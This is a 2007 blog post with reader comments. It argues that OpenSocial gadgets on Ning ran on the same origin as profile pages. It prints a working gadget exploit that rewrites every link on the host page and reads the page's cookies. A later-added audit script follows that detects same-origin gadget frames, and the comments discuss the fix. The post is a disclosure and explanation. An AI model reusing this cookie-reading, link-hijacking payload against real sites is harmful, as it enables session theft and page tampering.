Peer Prescience
Posted by harold at November 3rd, 2007
Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash some times—but this time I’m going to back it up with the facts and let you decide, doc.
It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary javascript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.
On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.
But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:
<iframe id="embeddingFrame" ... src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile"> </iframe>
Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.
Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:
<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Splendid!" />
  <Content type="html"><![CDATA[
    <script language="javascript">
      function exploit() {
        // This only works because the gadgetWrapper page serving the gadget is
        // on the same origin as the profile page; the browser therefore allows
        // the iframe to reach up to the top-level document.
        var doc = window.top.document;
        var a = doc.getElementsByTagName('a');
        for (var i = 0; i < a.length; i++) {
          if (a[i].hasAttribute('href')) {
            a[i].setAttribute('href',
              'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
          }
        }
        // Same origin again: the gadget frame sees the host site's cookies.
        document.getElementById('done').innerHTML = document.cookie;
      }
    </script>
    <font color="#ffffff"><form>
      <center>Click this button to make all of the links
      on this page go to haroldtherebel.com:<br/>
      <input type="button" onclick="exploit();"
        value="Exploit now!"><br/>
      cook-ease:<br/>
      <textarea id="done" rows="10" cols="60"></textarea></center>
    </form></font>
  ]]></Content>
</Module>
The exploit really speaks for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!
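The whole problem above comes down to one question: does the gadget iframe share the host page's origin? Here is an added example (not code from the original post, nor from Ning or Google) of a server-side or CI check that answers it: it resolves every iframe src in a page against the page URL and flags frames that end up same-origin, which is exactly the case in which window.top.document is reachable. The page URL and the second, separate-origin gadget host are assumed placeholders; the first src is the one quoted from Berlinetta's page.

```javascript
// Constructed sample page URL (placeholder, not a real site).
const SAMPLE_PAGE_URL = 'http://example-network.invalid/profile/berlinetta';

// Constructed sample HTML: the first iframe mirrors the src quoted in the post
// (a relative URL, so it inherits the profile page's origin); the second points
// at an assumed dedicated gadget-hosting origin, which is the shape of the fix.
const SAMPLE_HTML = `
<iframe id="embeddingFrame" src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile"> </iframe>
<iframe src="https://gadgets.sandbox-example.invalid/gadgetWrapper?url=http%3A%2F%2Fgadgets.example%2Fwidget.xml"></iframe>
`;

// Pull src attributes out of <iframe> tags. A regex is enough for this
// demonstration; a production scanner should use a real HTML parser.
function iframeSources(html) {
  const out = [];
  const re = /<iframe\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// For each iframe: resolve the src against the page URL, compare origins
// (scheme + host + port, which is what the browser's same-origin policy
// compares), and pull out the wrapped gadget XML URL if the wrapper has one.
function auditGadgetFrames(pageUrl, html) {
  const pageOrigin = new URL(pageUrl).origin;
  return iframeSources(html).map((src) => {
    const resolved = new URL(src, pageUrl);
    return {
      src,
      frameOrigin: resolved.origin,
      gadgetUrl: resolved.searchParams.get('url'),
      sameOrigin: resolved.origin === pageOrigin,
    };
  });
}

// Only the frames that can reach window.top.document are worth reporting.
function sameOriginGadgetFrames(pageUrl, html) {
  return auditGadgetFrames(pageUrl, html).filter((f) => f.sameOrigin);
}

for (const f of sameOriginGadgetFrames(SAMPLE_PAGE_URL, SAMPLE_HTML)) {
  console.log(`same-origin gadget frame: ${f.src} (gadget: ${f.gadgetUrl})`);
}
```

Moving user-supplied gadgets to a separate origin is what turns the `window.top.document` line into the permission-denied exception reported in the comments; the check above just makes that property easy to verify mechanically.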
Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborers making tennis shoes in south-east Asia any day.
Whoa, gotta hand it to ya Harold – you’re more deserving of the name haxz0r_mstr than I am right now. Well done!
haxz0r_mstr
You’ve gone and done it this time Harold. You are now endangering the livelihoods of millions just for the sake of your personal vendetta against Web 2.0. I don’t understand why you dislike it so much you antisocial recluse. And what was that about insulting your niece? You unkind and undeserving man!
And by the way, haxz0r_mstr, I have nothing to say to you until you stop being so lame and get a real name.
Erny Watson
FP!!
franc.perkinz@csfb.com
man i saw your article linked off reddit and like whoa that is one major major security hole. i’m gonna go delete all my social networking accounts now
albert mendez
A FLAW IN WEB 2.0 OH SHI- STOP THE PRESSES THIS IS BIG FUCKING NEWS!
0x20
Most of the people who comment here suck!
Wonder what the official response to this type of exploit will be?
the only thing you didn’t really consider I guess is that the server has a chance to intercept the document - so it wouldn’t be too hard to strip anything that refers to the parent document…
Henry
hey, where did you come from? great writing style, cool attitude, dang, i am going to have to keep checking back… enjoy, gregory
gregory
sorry, a second reply, but you might be the right person to ask….
doesn’t it seem like the sole purpose of web 2.0 is to collect as much data as possible on as many people as possible in the shortest amount of time? big brother with a relentless gleam in the eye, saliva forming, teeth gnashing?
and doesn’t it seem like microsoft and google long ago cut deals with the justice department, and have left back doors open for the feds?
i feel a bit foolish every time i am asked to register for some sort of new webby thing, because i just hit the x up in the right hand corner, but….
i don’t feel i am paranoid, it just intuitively feels like that is what is happening, which is ok, because humans are on the way to omniscience anyway, but still…..
gregory
It is up to the service hosting this container (Ning in this case) to sniff out bad code. Maybe they will start by blocking gadgets containing methods named exploit and linkspam_this_page_and_befriend_me
Even that is a lot of work for this gadgetWrapper proxy to do!
Welcome to the child of the browser wars.
Jamie Pitts
Great comments, boys! Some points:
Henry and Jamie: I agree, the server has an opportunity to intercept the gadget code. But how is it going to fully scrub the code? The dynamic semantics of Javascript make it hard enough, and then there’s the fact that different browsers implement JS and the DOM differently. It’s always a game of cat and mouse trying to patch up malicious code! What would have made more sense from a security standpoint is a fully-defined gadget language which is strictly checked and then translated to Javascript. But boo-hoo, then you can’t take advantage of all those fancy new Web 2.0 features that just got hacked into your favorite browser until the server updates its support!
Gregory: I totally agree that Web 2.0 is about creating and holding onto customer relationships, regardless of whether the customer’s interested. Being old and jaded, I’m more inclined to say that the feds don’t have much to do with instituting all the tracking, though they’ll definitely make use of the data when they can. It just so happens that advertisers and authoritarians are looking for the same thing: to predict and influence consumer behavior. And because Web 2.0 provides trivial to no value to the consumer, they can’t sell service to the consumer… so instead we, as site visitors, are sold as cattle to the highest bidder (which is usually pretty low!)
I’m going to be posting more along these lines, including some possible ways out of this mess in the future. I don’t have a set blogging schedule, but a post once a week sounds about right.
harold
Looks like it’s fixed, at least in Firefox 2. Clicking the button throws:
uncaught exception: Permission denied to get property HTMLDocument.getElementsByTagName
in the firebug console.
I’m sure Ning will thank you for consulting for them for free…
brian rue
Dude http://www.wiretrip.net/rfp/policy.html ‘nough said.
Robert
Presumably Ning changed the src attribute in the iframe to point to a different top-level domain than the iframe containing the exploit. That’s all they really needed to do to fix the issue. You should never allow user active content in an iframe at the same top-level domain as the parent, anyway. Ning should have known better.
Mr. Drano